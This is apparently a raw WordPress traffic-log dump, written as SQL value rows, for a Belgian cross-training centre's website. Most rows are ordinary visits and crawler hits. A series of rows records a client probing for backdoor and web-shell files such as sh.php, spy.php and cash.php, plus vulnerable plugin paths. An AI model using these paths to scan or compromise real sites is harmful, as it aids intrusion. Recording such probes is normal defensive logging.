(72531, 1494705891.174589, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72532, 1494705891.579892, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72533, 1494705891.984596, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72534, 1494705892.414606, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72535, 1494705892.833520, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72536, 1494705893.238205, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72537, 1494705893.690142, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72538, 1494705894.159570, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72539, 1494705894.579887, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72540, 1494705894.979832, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72541, 1494709918.094154, 100662559, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72542, 1494714063.248098, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72543, 1494727658.189207, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/09/class-wp-upgrade.php', 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/09/class-wp-upgrade.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72544, 1494747128.521356, 783526296, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72545, 1494747129.226093, 783526296, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72546, 1494747129.717862, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72547, 1494747130.326340, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72548, 1494747130.814067, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72549, 1494747131.366164, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72550, 1494747131.967184, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72551, 1494747132.454901, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72552, 1494747132.922384, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72553, 1494747133.358405, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72554, 1494747133.809375, 783526296, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72555, 1494752303.911729, 2637637568, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72556, 1494753798.535245, 584016457, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(72557, 1494753799.464197, 584016457, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'ia_archiver'),
(72558, 1494753977.077485, 2955169831, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(72559, 1494753979.260054, 2955169831, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(72560, 1494760744.331789, 3154466025, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72561, 1494767536.795779, 2513049709, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cash.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72562, 1494767539.470859, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/cssf.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72563, 1494767542.994575, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/3caa.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72564, 1494767545.477088, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sh.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72565, 1494767549.113669, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/read.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72566, 1494767551.041879, 2513049709, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/spy.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72567, 1494767558.041270, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Matun.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72568, 1494767560.067304, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/alias.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72569, 1494767561.990769, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Ehxjfhv.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72570, 1494767565.554766, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/ms-media.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72571, 1494767568.999357, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Mydsvx.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72572, 1494767583.592447, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-lop.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72573, 1494767585.932187, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Gmdrdtfh.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72574, 1494767588.114555, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/c.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72575, 1494767590.013914, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wdphhaut.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72576, 1494767594.095898, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/db.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72577, 1494767598.186067, 2513049709, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/libravatar-replace/libravatar-replace.php', '', 'Mozilla/5.0 (Linux; Android 4.0.4; SGH-T879 Build/IMM76D) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.58 Mobile Safari/537.31'),
(72578, 1494771888.065935, 1123632438, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72579, 1494771888.545359, 1123632438, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72580, 1494775707.178851, 3024883593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72581, 1494777045.605451, 3652617236, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72582, 1494777065.416911, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72583, 1494791266.022386, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/', 'http://crosstrainingcenter.be/wp-content/plugins/revslider/temp/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72584, 1494791426.678654, 1538649748, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72585, 1494795580.379883, 2637637568, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72586, 1494795580.500143, 2637637568, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72587, 1494797592.954812, 1538626519, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATNbn-7EaLEgMUoup7uTtmsjmvCyEy-dLRqODLQa7OkxcGPc2zv7-lpc97dMNNa0dDF_42OcAq6tj-nT5CtzOPp9CYs8oX6lNT9PKHNLSMJpWW454w', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72588, 1494797593.150689, 2918995415, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(72589, 1494797630.212968, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72590, 1494797822.704573, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72591, 1494797828.617601, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72592, 1494797842.169785, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72593, 1494797851.605036, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72594, 1494797855.675054, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72595, 1494798354.964844, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72596, 1494798355.397041, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72597, 1494798355.858019, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72598, 1494798356.258482, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72599, 1494798356.743251, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72600, 1494798357.528363, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72601, 1494798358.050692, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72602, 1494798358.526202, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72603, 1494798359.191587, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72604, 1494798359.627537, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72605, 1494798360.056894, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72606, 1494798360.533608, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72607, 1494798360.950194, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72608, 1494798361.387535, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72609, 1494799610.497498, 1538626519, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 [FBAN/FBIOS;FBAV/92.0.0.46.70;FBBV/57733420;FBDV/iPhone6,2;FBMD/iPhone;FBSN/iOS;FBSV/10.2.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(72610, 1494804609.152051, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72611, 1494804609.629949, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72612, 1494810970.375213, 3657086074, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72613, 1494813737.729848, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72614, 1494815602.326017, 1347558503, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js', '', 'Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2928.82 Safari/537.36'),
(72615, 1494816261.752084, 1053970255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36'),
(72616, 1494822776.953370, 1439270026, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; ONEPLUS A3003 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72617, 1494822778.807776, 1439270026, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; ONEPLUS A3003 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72618, 1494824698.821118, 96260934, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72619, 1494824699.537057, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72620, 1494824700.098853, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72621, 1494824701.095678, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72622, 1494824701.739377, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72623, 1494824702.391656, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72624, 1494824703.013328, 96260934, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72625, 1494825357.542110, 1123632584, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72626, 1494825358.668547, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72627, 1494830284.931488, 3154455105, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72628, 1494830285.580213, 3154455105, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72629, 1494830286.087216, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72630, 1494830286.629465, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72631, 1494830287.182337, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72632, 1494830287.704626, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72633, 1494830288.305181, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72634, 1494830288.809644, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72635, 1494830289.321663, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72636, 1494830289.822408, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72637, 1494830290.331896, 3154455105, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72638, 1494830494.717741, 1054099761, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
